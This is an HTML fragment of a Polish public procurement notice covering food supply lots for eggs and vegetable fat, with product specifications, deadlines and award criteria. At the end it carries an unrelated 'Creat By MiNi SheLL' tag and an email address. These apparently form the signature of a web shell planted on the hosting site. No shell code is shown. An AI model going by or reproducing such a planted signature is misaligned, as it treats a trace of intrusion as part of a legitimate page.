<li>2. termin płatności - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ VII: JAJA
1) Jaja klasa A (konsumpcyjne) CPV 03142500-3 kategoria wagowa M

Inne informacje o produkcie:
pakowanie - w pojemnikach przeznaczonych do transportu jaj;
znakowanie - etykietą zgodnie z obowiązującymi przepisami w języku polskim;
termin przydatności do spożycia - znakowanie czytelne na opakowaniu jednostkowym zgodnie z obowiązującymi przepisami min. 21 dni;
przechowywanie - warunki składowania określone na opakowaniu  jednostkowym i zgodne z warunkami systemu HACCP dla tego produktu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Tłuszcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ VIII: TŁUSZCZE
1) Tłuszcz do smarowania pieczywa CPV 15430000-1 opakowanie jednostkowe 0,25 kg. Tłuszcz roślinny - produkt przeznaczony do spożycia w formie gotowej (np. do smarowania pieczywa), a także przeznaczony do obróbki termicznej (np. do sporządzenia zasmażek, sosów itp.). 

Dostarczony towar musi stanowić jednorodną partię produkcyjną, posiadać tą samą datę przydatności do spożycia.
Na każdym dostarczonym produkcie musi być etykieta z następującymi danymi:
nazwa oraz adres dostawcy lub producenta;
nazwa oraz rodzaj produktu;
termin przydatności do spożycia min. 60 dni od dostawy;
warunki przechowywania;
skład i waga..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.43.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin płatności - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com